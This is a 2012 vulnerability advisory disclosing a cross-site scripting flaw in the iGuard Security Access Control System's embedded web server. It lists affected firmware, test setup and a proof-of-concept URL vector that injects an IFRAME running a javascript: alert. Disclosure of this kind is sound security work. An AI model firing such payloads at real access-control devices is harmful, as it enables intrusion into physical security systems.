iGuard Security Access Control System Cross Site Scripting

`Tile  
====  
iGuard Security Access Control System Webserver, Cross Site Scripting (XSS)  
  
  
Author  
======  
  
Usman Saeed , Xc0re Security Research Group  
  
Website : http://www.xc0re.net  
  
Twitter : http://twitter.com/xc0resecurity  
  
Blog : http://www.xc0re.net/blog  
  
Published : http://www.xc0re.net/index.php?p=1_25_iGuard-Biometrics-Access-Control-Webserver-XSS  
  
  
Date  
====  
2nd , May , 2012  
  
  
  
Severity:  
=========  
Medium  
  
  
  
Description  
===========  
iGuard Biometrics Access Control or iGuard Security Access Control System has Cross Site Scripting vulnerability in its embedded webserver , iGuard Embedded Web Server/3.6.7427A.   
  
  
  
Previous Vulnerability  
======================  
The Previous Vulnerability was discovered in 2011, iGuard Biometrics Access Control cross-site scripting, caused by improper validation of user-supplied input by the month, record and department modules.  
  
  
  
  
Target iGuard System Scecifications  
============================  
  
Device Firmware Version : 3.6.7427A   
  
Device WebServer : iGuard Embedded Web Server/3.6.7427A   
  
  
  
Tested on   
=========  
  
Windows 7 Professional   
  
  
Browser Used  
=============  
Mozilla Firefox 12.0   
  
  
Vector  
======  
  
http://[Remote host]/></font><IFRAME SRC="JAVASCRIPT:alert('XSS Found by Usman Saeed , Xc0re Security Research Group');">.asp  
  
  
  
  
  
  
Copyright © 2012| Xc0re Security Research Group  
  
  
  
`